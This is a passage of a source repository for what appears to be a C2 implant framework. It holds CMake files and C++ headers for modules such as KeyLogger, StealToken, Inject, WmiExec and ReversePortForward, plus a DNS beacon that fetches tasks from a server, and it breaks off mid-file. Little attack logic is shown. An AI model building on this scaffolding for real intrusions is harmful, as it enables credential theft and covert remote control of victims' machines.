-------------------------------------------------------------------------------- 1 | #include "../EnumerateShares.hpp" 2 | 3 | bool testEnumerateShares(); 4 | 5 | int main() 6 | { 7 | bool res; 8 | std::cout << "[+] testEnumerateShares" << std::endl; 9 | res = testEnumerateShares(); 10 | if (res) 11 | std::cout << "[+] Sucess" << std::endl; 12 | else 13 | std::cout << "[-] Failed" << std::endl; 14 | return !res; 15 | } 16 | 17 | bool testEnumerateShares() 18 | { 19 | std::unique_ptr mod = std::make_unique(); 20 | std::vector cmd = {"enumerateShares"}; 21 | C2Message msg, ret; 22 | mod->init(cmd, msg); 23 | mod->process(msg, ret); 24 | 25 | std::cout << "[+] enumerateShares output: " << ret.returnvalue() << std::endl; 26 | 27 | return !ret.returnvalue().empty(); 28 | } 29 | -------------------------------------------------------------------------------- /modules/Rev2self/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(Rev2self SHARED Rev2self.cpp) 3 | set_property(TARGET Rev2self PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(Rev2self ) 5 | add_custom_command(TARGET Rev2self POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsRev2self tests/testsRev2self.cpp Rev2self.cpp) 10 | target_link_libraries(testsRev2self ) 11 | add_custom_command(TARGET testsRev2self POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsRev2self COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /modules/ChangeDirectory/ChangeDirectory.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class ChangeDirectory : public ModuleCmd 7 | { 8 | 9 | public: 10 | ChangeDirectory(); 11 | ~ChangeDirectory(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int osCompatibility() 18 | { 19 | return OS_LINUX | OS_WINDOWS; 20 | } 21 | 22 | private: 23 | std::string changeDirectory(const std::string& path); 24 | 25 | }; 26 | 27 | 28 | #ifdef _WIN32 29 | 30 | extern "C" __declspec(dllexport) ChangeDirectory * ChangeDirectoryConstructor(); 31 | 32 | #else 33 | 34 | extern "C" __attribute__((visibility("default"))) ChangeDirectory * ChangeDirectoryConstructor(); 35 | 36 | #endif 37 | -------------------------------------------------------------------------------- /modules/IpConfig/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(IpConfig SHARED IpConfig.cpp) 3 | set_property(TARGET IpConfig PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(IpConfig ) 5 | add_custom_command(TARGET IpConfig POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsIpConfig tests/testsIpConfig.cpp IpConfig.cpp) 10 | target_link_libraries(testsIpConfig ) 11 | add_custom_command(TARGET testsIpConfig POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | add_test(NAME testsIpConfig COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 14 | endif() 15 | -------------------------------------------------------------------------------- /modules/KerberosUseTicket/KerberosUseTicket.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class KerberosUseTicket : public ModuleCmd 7 | { 8 | 9 | public: 10 | KerberosUseTicket(); 11 | ~KerberosUseTicket(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int osCompatibility() 18 | { 19 | return OS_WINDOWS; 20 | } 21 | 22 | private: 23 | std::string importTicket(const std::string& ticket); 24 | }; 25 | 26 | 27 | #ifdef _WIN32 28 | 29 | extern "C" __declspec(dllexport) KerberosUseTicket * KerberosUseTicketConstructor(); 30 | 31 | #else 32 | 33 | extern "C" __attribute__((visibility("default"))) KerberosUseTicket * KerberosUseTicketConstructor(); 34 | 35 | #endif 36 | -------------------------------------------------------------------------------- /modules/KeyLogger/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(KeyLogger SHARED KeyLogger.cpp) 3 | set_property(TARGET KeyLogger PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(KeyLogger ) 5 | add_custom_command(TARGET KeyLogger POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsKeyLogger tests/testsKeyLogger.cpp KeyLogger.cpp) 10 | target_link_libraries(testsKeyLogger ) 11 | add_custom_command(TARGET testsKeyLogger POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsKeyLogger COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /modules/MakeToken/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(MakeToken SHARED MakeToken.cpp) 3 | set_property(TARGET MakeToken PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(MakeToken ) 5 | add_custom_command(TARGET MakeToken POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsMakeToken tests/testsMakeToken.cpp MakeToken.cpp) 10 | target_link_libraries(testsMakeToken ) 11 | add_custom_command(TARGET testsMakeToken POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsMakeToken COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /modules/Powershell/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(Powershell SHARED Powershell.cpp) 3 | set_property(TARGET Powershell PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(Powershell ) 5 | add_custom_command(TARGET Powershell POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsPowershell tests/testsPowershell.cpp Powershell.cpp) 10 | target_link_libraries(testsPowershell ) 11 | add_custom_command(TARGET testsPowershell POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsPowershell COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /modules/StealToken/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(StealToken SHARED StealToken.cpp) 3 | set_property(TARGET StealToken PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(StealToken ) 5 | add_custom_command(TARGET StealToken POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsStealToken tests/testsStealToken.cpp StealToken.cpp) 10 | target_link_libraries(testsStealToken ) 11 | add_custom_command(TARGET testsStealToken POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsStealToken COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /modules/Inject/Inject.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | #ifdef _WIN32 6 | #include 7 | #endif 8 | 9 | class Inject : public ModuleCmd 10 | { 11 | 12 | public: 13 | Inject(); 14 | ~Inject(); 15 | 16 | std::string getInfo(); 17 | 18 | int initConfig(const nlohmann::json &config); 19 | int init(std::vector& splitedCmd, C2Message& c2Message); 20 | int process(C2Message& c2Message, C2Message& c2RetMessage); 21 | int osCompatibility() 22 | { 23 | return OS_WINDOWS; 24 | } 25 | 26 | private: 27 | std::string m_processToSpawn; 28 | bool m_useSyscall; 29 | 30 | }; 31 | 32 | 33 | #ifdef _WIN32 34 | 35 | extern "C" __declspec(dllexport) Inject * A_InjectConstructor(); 36 | 37 | #else 38 | 39 | extern "C" __attribute__((visibility("default"))) Inject * InjectConstructor(); 40 | 41 | #endif 42 | -------------------------------------------------------------------------------- /modules/PrintWorkingDirectory/PrintWorkingDirectory.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class PrintWorkingDirectory : public ModuleCmd 7 | { 8 | 9 | public: 10 | PrintWorkingDirectory(); 11 | ~PrintWorkingDirectory(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int osCompatibility() 18 | { 19 | return OS_LINUX | OS_WINDOWS; 20 | } 21 | 22 | private: 23 | std::string printWorkingDirectory(); 24 | 25 | }; 26 | 27 | 28 | #ifdef _WIN32 29 | 30 | extern "C" __declspec(dllexport) PrintWorkingDirectory * PrintWorkingDirectoryConstructor(); 31 | 32 | #else 33 | 34 | extern "C" __attribute__((visibility("default"))) PrintWorkingDirectory * PrintWorkingDirectoryConstructor(); 35 | 36 | #endif 37 | -------------------------------------------------------------------------------- /modules/WmiExec/WmiExec.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class WmiExec : public ModuleCmd 7 | { 8 | 9 | public: 10 | WmiExec(); 11 | ~WmiExec(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int errorCodeToMsg(const C2Message& c2RetMessage, std::string& errorMsg); 18 | int osCompatibility() 19 | { 20 | return OS_WINDOWS; 21 | } 22 | 23 | private: 24 | #ifdef _WIN32 25 | int execute(C2Message &c2Message, std::string& result) const; 26 | #endif 27 | 28 | }; 29 | 30 | 31 | #ifdef _WIN32 32 | 33 | extern "C" __declspec(dllexport) WmiExec * WmiExecConstructor(); 34 | 35 | #else 36 | 37 | extern "C" __attribute__((visibility("default"))) WmiExec * WmiExecConstructor(); 38 | 39 | #endif 40 | -------------------------------------------------------------------------------- /modules/WinRM/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(WinRM SHARED WinRM.cpp) 3 | set_property(TARGET WinRM PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | add_custom_command(TARGET WinRM POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 5 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 6 | 7 | if(WIN32) 8 | target_link_libraries(WinRM PRIVATE WsmSvc) 9 | endif() 10 | 11 | if(C2CORE_BUILD_TESTS) 12 | add_executable(testsWinRM tests/testsWinRM.cpp WinRM.cpp) 13 | if(WIN32) 14 | target_link_libraries(testsWinRM PRIVATE WsmSvc) 15 | endif() 16 | add_custom_command(TARGET testsWinRM POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 17 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 18 | 19 | add_test(NAME testsWinRM COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 20 | endif() 21 | -------------------------------------------------------------------------------- /modules/ListDirectory/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(ListDirectory SHARED ListDirectory.cpp) 3 | target_link_libraries(ListDirectory ) 4 | set_property(TARGET ListDirectory PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 5 | add_custom_command(TARGET ListDirectory POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsListDirectory tests/testsListDirectory.cpp ListDirectory.cpp) 10 | target_link_libraries(testsListDirectory ) 11 | add_custom_command(TARGET testsListDirectory POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsListDirectory COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /modules/WinRM/WinRM.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | #include 6 | #include 7 | 8 | 9 | class WinRM : public ModuleCmd 10 | { 11 | public: 12 | WinRM(); 13 | ~WinRM(); 14 | 15 | std::string getInfo(); 16 | 17 | int init(std::vector& splitedCmd, C2Message& c2Message); 18 | int process(C2Message& c2Message, C2Message& c2RetMessage); 19 | int errorCodeToMsg(const C2Message& c2RetMessage, std::string& errorMsg); 20 | 21 | int osCompatibility() 22 | { 23 | return OS_WINDOWS; 24 | } 25 | 26 | private: 27 | #ifdef _WIN32 28 | int runCommand(const C2Message& c2Message, std::string& result) const; 29 | #endif 30 | 31 | }; 32 | 33 | 34 | #ifdef _WIN32 35 | extern "C" __declspec(dllexport) WinRM* WinRMConstructor(); 36 | #else 37 | extern "C" __attribute__((visibility("default"))) WinRM* WinRMConstructor(); 38 | #endif 39 | -------------------------------------------------------------------------------- /modules/KillProcess/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(KillProcess SHARED KillProcess.cpp) 3 | set_property(TARGET KillProcess PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(KillProcess ) 5 | add_custom_command(TARGET KillProcess POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$" 7 | ) 8 | 9 | if(C2CORE_BUILD_TESTS) 10 | add_executable(testsKillProcess tests/testsKillProcess.cpp KillProcess.cpp) 11 | target_link_libraries(testsKillProcess ) 12 | add_custom_command(TARGET testsKillProcess POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 13 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 14 | 15 | add_test(NAME testsKillProcess COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 16 | endif() 17 | -------------------------------------------------------------------------------- /modules/ScreenShot/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(ScreenShot SHARED ScreenShot.cpp ScreenShooter.cpp) 3 | set_property(TARGET ScreenShot PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(ScreenShot ) 5 | add_custom_command(TARGET ScreenShot POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsScreenShot tests/testsScreenShot.cpp ScreenShot.cpp ScreenShooter.cpp) 10 | target_link_libraries(testsScreenShot ) 11 | add_custom_command(TARGET testsScreenShot POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsScreenShot COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /modules/ModuleTemplate/ModuleTemplate.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class ModuleTemplate : public ModuleCmd 7 | { 8 | 9 | public: 10 | ModuleTemplate(); 11 | ~ModuleTemplate(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg); 18 | int followUp(const C2Message &c2RetMessage); 19 | int osCompatibility() 20 | { 21 | return OS_LINUX | OS_WINDOWS; 22 | } 23 | 24 | private: 25 | 26 | }; 27 | 28 | 29 | #ifdef _WIN32 30 | 31 | extern "C" __declspec(dllexport) ModuleTemplate * ModuleTemplateConstructor(); 32 | 33 | #else 34 | 35 | extern "C" __attribute__((visibility("default"))) ModuleTemplate * ModuleTemplateConstructor(); 36 | 37 | #endif 38 | -------------------------------------------------------------------------------- /modules/Run/Run.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | #ifdef _WIN32 6 | #include 7 | #endif 8 | 9 | 10 | class Run : public ModuleCmd 11 | { 12 | 13 | public: 14 | Run(); 15 | ~Run(); 16 | 17 | std::string getInfo(); 18 | 19 | int init(std::vector& splitedCmd, C2Message& c2Message); 20 | int process(C2Message& c2Message, C2Message& c2RetMessage); 21 | int osCompatibility() 22 | { 23 | return OS_LINUX | OS_WINDOWS; 24 | } 25 | 26 | private: 27 | std::string execBash(const std::string& cmd); 28 | 29 | #ifdef _WIN32 30 | bool m_isProcessRuning; 31 | HANDLE m_processHandle; 32 | int killProcess(); 33 | #endif 34 | }; 35 | 36 | 37 | #ifdef _WIN32 38 | 39 | extern "C" __declspec(dllexport) Run * RunConstructor(); 40 | 41 | #else 42 | 43 | extern "C" __attribute__((visibility("default"))) Run * RunConstructor(); 44 | 45 | #endif -------------------------------------------------------------------------------- /modules/CimExec/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(CimExec SHARED CimExec.cpp) 3 | set_property(TARGET CimExec PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | add_custom_command(TARGET CimExec POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 5 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 6 | 7 | if(WIN32) 8 | target_link_libraries(CimExec PRIVATE mi) 9 | endif() 10 | 11 | if(C2CORE_BUILD_TESTS) 12 | add_executable(testsCimExec tests/testsCimExec.cpp CimExec.cpp) 13 | if(WIN32) 14 | target_link_libraries(testsCimExec PRIVATE mi) 15 | endif() 16 | add_custom_command(TARGET testsCimExec POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 17 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 18 | 19 | add_test(NAME testsCimExec COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 20 | endif() 21 | -------------------------------------------------------------------------------- /modules/ListProcesses/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(ListProcesses SHARED ListProcesses.cpp) 3 | set_property(TARGET ListProcesses PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(ListProcesses ) 5 | add_custom_command(TARGET ListProcesses POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsListProcesses tests/testsListProcesses.cpp ListProcesses.cpp) 10 | target_link_libraries(testsListProcesses ) 11 | add_custom_command(TARGET testsListProcesses POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsListProcesses COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /modules/ScreenShot/ScreenShot.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class ScreenShot : public ModuleCmd 7 | { 8 | 9 | public: 10 | ScreenShot(); 11 | ~ScreenShot(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg); 18 | int recurringExec(C2Message& c2RetMessage); 19 | int followUp(const C2Message &c2RetMessage); 20 | int osCompatibility() 21 | { 22 | return OS_WINDOWS; 23 | } 24 | 25 | private: 26 | 27 | }; 28 | 29 | 30 | #ifdef _WIN32 31 | 32 | extern "C" __declspec(dllexport) ScreenShot * ScreenShotConstructor(); 33 | 34 | #else 35 | 36 | extern "C" __attribute__((visibility("default"))) ScreenShot * ScreenShotConstructor(); 37 | 38 | #endif 39 | -------------------------------------------------------------------------------- /modules/MakeToken/MakeToken.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class MakeToken : public ModuleCmd 7 | { 8 | 9 | public: 10 | MakeToken(); 11 | ~MakeToken(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg); 18 | int osCompatibility() 19 | { 20 | return OS_WINDOWS; 21 | } 22 | 23 | private: 24 | std::string makeToken(const std::string& username, const std::string& domain, const std::string& password); 25 | }; 26 | 27 | 28 | #ifdef _WIN32 29 | 30 | extern "C" __declspec(dllexport) MakeToken * MakeTokenConstructor(); 31 | 32 | #else 33 | 34 | extern "C" __attribute__((visibility("default"))) MakeToken * MakeTokenConstructor(); 35 | 36 | #endif 37 | -------------------------------------------------------------------------------- /modules/ModuleTemplate/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(ModuleTemplate SHARED ModuleTemplate.cpp) 3 | set_property(TARGET ModuleTemplate PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(ModuleTemplate ) 5 | add_custom_command(TARGET ModuleTemplate POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsModuleTemplate tests/testsModuleTemplate.cpp ModuleTemplate.cpp) 10 | target_link_libraries(testsModuleTemplate ) 11 | add_custom_command(TARGET testsModuleTemplate POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsModuleTemplate COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /modules/ChangeDirectory/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(ChangeDirectory SHARED ChangeDirectory.cpp) 3 | set_property(TARGET ChangeDirectory PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(ChangeDirectory ) 5 | add_custom_command(TARGET ChangeDirectory POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsChangeDirectory tests/testsChangeDirectory.cpp ChangeDirectory.cpp) 10 | target_link_libraries(testsChangeDirectory ) 11 | add_custom_command(TARGET testsChangeDirectory POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsChangeDirectory COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /modules/KerberosUseTicket/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(KerberosUseTicket SHARED KerberosUseTicket.cpp) 3 | set_property(TARGET KerberosUseTicket PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(KerberosUseTicket ) 5 | add_custom_command(TARGET KerberosUseTicket POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsKerberosUseTicket tests/testsKerberosUseTicket.cpp KerberosUseTicket.cpp) 10 | target_link_libraries(testsKerberosUseTicket ) 11 | add_custom_command(TARGET testsKerberosUseTicket POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsKerberosUseTicket COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: 2 | 3 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 4 | 5 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 6 | -------------------------------------------------------------------------------- /modules/Chisel/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(Chisel SHARED Chisel.cpp) 3 | 4 | set_property(TARGET Chisel PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 5 | 6 | target_link_libraries(Chisel PRIVATE Donut ) 7 | 8 | add_custom_command(TARGET Chisel POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 9 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 10 | 11 | if(C2CORE_BUILD_TESTS) 12 | add_executable(testsChisel tests/testsChisel.cpp Chisel.cpp) 13 | 14 | if(WIN32) 15 | target_link_libraries(testsChisel PRIVATE Donut ) 16 | else() 17 | target_link_libraries(testsChisel PRIVATE Donut ${aplib64} ) 18 | endif() 19 | 20 | add_custom_command(TARGET testsChisel POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 21 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 22 | 23 | add_test(NAME testsChisel COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 24 | endif() 25 | 26 | -------------------------------------------------------------------------------- /modules/ReversePortForward/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(ReversePortForward SHARED ReversePortForward.cpp) 3 | set_property(TARGET ReversePortForward PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(ReversePortForward) 5 | add_custom_command(TARGET ReversePortForward POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsReversePortForward tests/testsReversePortForward.cpp ReversePortForward.cpp) 10 | target_link_libraries(testsReversePortForward) 11 | add_custom_command(TARGET testsReversePortForward POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | add_test(NAME testsReversePortForward COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 14 | endif() 15 | -------------------------------------------------------------------------------- /beacon/BeaconDns.cpp: -------------------------------------------------------------------------------- 1 | #include "BeaconDns.hpp" 2 | #include 3 | 4 | 5 | using namespace std; 6 | using namespace dns; 7 | 8 | 9 | BeaconDns::BeaconDns(std::string& config, const std::string& dnsServer, const std::string& domain) 10 | : Beacon() 11 | { 12 | // beacon and modules config 13 | initConfig(config); 14 | 15 | m_client=new Client(dnsServer, domain); 16 | } 17 | 18 | 19 | BeaconDns::~BeaconDns() 20 | { 21 | delete m_client; 22 | } 23 | 24 | 25 | void BeaconDns::checkIn() 26 | { 27 | SPDLOG_DEBUG("initConnection"); 28 | 29 | std::string output; 30 | taskResultsToCmd(output); 31 | 32 | SPDLOG_DEBUG("sending output.size {0}", std::to_string(output.size())); 33 | 34 | m_client->sendMessage(output); 35 | 36 | std::string input = m_client->requestMessage(); 37 | 38 | if(!input.empty()) 39 | { 40 | SPDLOG_DEBUG("received input.size {0}", std::to_string(input.size())); 41 | cmdToTasks(input); 42 | } 43 | } 44 | 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /modules/SpawnAs/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(SpawnAs SHARED SpawnAs.cpp) 3 | set_property(TARGET SpawnAs PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(SpawnAs ${Donut} ) 5 | 6 | if(WIN32) 7 | target_link_libraries(SpawnAs advapi32 userenv) 8 | endif() 9 | add_custom_command(TARGET SpawnAs POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 